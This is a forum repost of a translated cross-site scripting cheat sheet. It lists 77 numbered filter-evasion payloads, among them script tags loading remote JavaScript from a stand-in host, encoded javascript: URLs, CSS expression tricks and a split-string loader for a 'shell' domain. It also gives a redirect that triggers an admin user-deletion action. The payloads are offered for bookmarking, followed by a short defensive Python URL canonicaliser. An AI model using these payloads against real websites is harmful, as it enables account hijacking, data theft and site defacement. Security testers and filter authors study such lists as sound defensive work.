It seems t00ls has fairly little material on XSS. I saw something good and copied it over, in case any of you need to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag with no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML entity encoding (the semicolon is required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-bit UTF-8 Unicode encoding, no semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>
(11) Embedded tab splitting up the JavaScript (in items 11-15 the control character inside "jav ascript" was flattened to a space when the list was copied)
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Multi-line injected JavaScript; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Working around character limits (all fragments must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2. Null characters are basically ineffective domestically, since there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Extra opening brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and a few other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping JavaScript escapes
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) Style sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>
(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters inserted (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with the expression split up
<IMG STYLE="xss:expression(alert('XSS'))">
(50) Anonymous tag with a STYLE attribute (made of an opening angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>
(56) Using ActionScript inside Flash you can smuggle your XSS code in
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace. The .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL evasion
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) IP in decimal
<A HREF="http://3232235521">XSS</A>
(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>
(76) Trailing dot (absolute DNS name)
<A HREF="http://www.google.com./">XSS</A>
(77) JavaScript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
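Added example (my own, not from the cheat sheet): a Python canonicaliser for the URL-evasion vectors 68-76, turning the decimal, hex, octal and mixed IPv4 spellings, protocol-relative links and trailing-dot hostnames into one comparable host string for an allow- or block-list check. The number parsing follows the WHATWG URL specification's IPv4 rules; urlsplit is the standard library's, and the test inputs are constructed from the vectors above.

```python
import re
from urllib.parse import urlsplit
from typing import Optional

# Digit set per radix; checked before int() so "1_0" or "+1" cannot slip through.
_DIGITS = {16: r"[0-9a-f]+", 8: r"[0-7]+", 10: r"[0-9]+"}

def _ipv4_number(label: str) -> Optional[int]:
    # WHATWG IPv4 number parser: "0x" prefix is hex, a leading "0" is octal,
    # anything else is decimal. None means the label is a DNS name, not a number.
    label = label.lower()
    if label.startswith("0x"):
        digits, base = label[2:], 16
        if digits == "":
            return 0                     # a bare "0x" label counts as zero
    elif len(label) > 1 and label[0] == "0":
        digits, base = label[1:], 8
    else:
        digits, base = label, 10
    return int(digits, base) if re.fullmatch(_DIGITS[base], digits) else None

def legacy_ipv4_to_dotted(host: str) -> Optional[str]:
    """Render 3232235521, 0xc0.0xa8.0x00.0x01, 0300.0250.0000.0001 etc. as a.b.c.d."""
    labels = host.rstrip(".").split(".")
    if not 1 <= len(labels) <= 4:
        return None
    numbers = [_ipv4_number(l) for l in labels]
    if None in numbers or any(n > 255 for n in numbers[:-1]):
        return None
    if numbers[-1] >= 256 ** (5 - len(numbers)):
        return None                      # the last label fills the remaining bytes
    value = numbers[-1]
    for i, n in enumerate(numbers[:-1]):
        value += n << (8 * (3 - i))
    return ".".join(str((value >> shift) & 255) for shift in (24, 16, 8, 0))

def canonical_host(href: str) -> Optional[str]:
    """Host a browser would contact for href, in one comparable form, or None.
    Drops tab/LF/CR anywhere (73), accepts protocol-relative URLs (74), lower-cases,
    removes the absolute-DNS trailing dot (76), rewrites the IPv4 forms of 70-73."""
    cleaned = re.sub(r"[\t\r\n]", "", href.strip())
    if cleaned.startswith("//"):
        cleaned = "http:" + cleaned
    host = urlsplit(cleaned).hostname    # already lower-cased, port and userinfo removed
    if not host:
        return None                      # e.g. a javascript: link (77) has no host
    host = host.rstrip(".")
    return legacy_ipv4_to_dotted(host) or host
```

Vector 69 (a percent-encoded host) and vector 75 (dropping "www") are not covered: the first needs the host unquoted before comparison, the second needs DNS or a registrable-domain comparison rather than string equality.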
Original source: http://fuzzexp.org/u/0day/?p=149